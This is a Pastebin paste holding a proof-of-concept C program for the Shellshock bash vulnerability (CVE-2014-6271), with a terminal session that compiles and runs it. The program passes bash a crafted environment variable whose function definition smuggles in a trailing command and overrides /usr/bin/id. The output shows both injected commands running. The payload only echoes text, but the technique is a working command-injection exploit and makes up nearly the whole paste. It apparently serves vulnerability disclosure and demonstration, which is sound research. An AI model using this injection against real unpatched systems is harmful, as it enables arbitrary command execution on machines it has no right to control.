Guest User

bash-is-fun

a guest
Sep 24th, 2014
1,794
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. je@tiny:~$ cat > bash-is-fun.c
  2. /* CVE-2014-6271 + aliases with slashes PoC - je [at] clevcode [dot] org */
  3. #include <unistd.h>
  4. #include <stdio.h>
  5.  
  6. int main()
  7. {
  8.     char *envp[] = {
  9.         "PATH=/bin:/usr/bin",
  10.         "/usr/bin/id=() { "
  11.         "echo pwn me twice, shame on me; }; "
  12.         "echo pwn me once, shame on you",
  13.         NULL
  14.     };
  15.     char *argv[] = { "/bin/bash", NULL };
  16.  
  17.     execve(argv[0], argv, envp);
  18.     perror("execve");
  19.     return 1;
  20. }
  21. ^D
  22. je@tiny:~$ gcc -o bash-is-fun bash-is-fun.c
  23. je@tiny:~$ ./bash-is-fun
  24. pwn me once, shame on you
  25. je@tiny:/home/je$ /usr/bin/id
  26. pwn me twice, shame on me
RAW Paste Data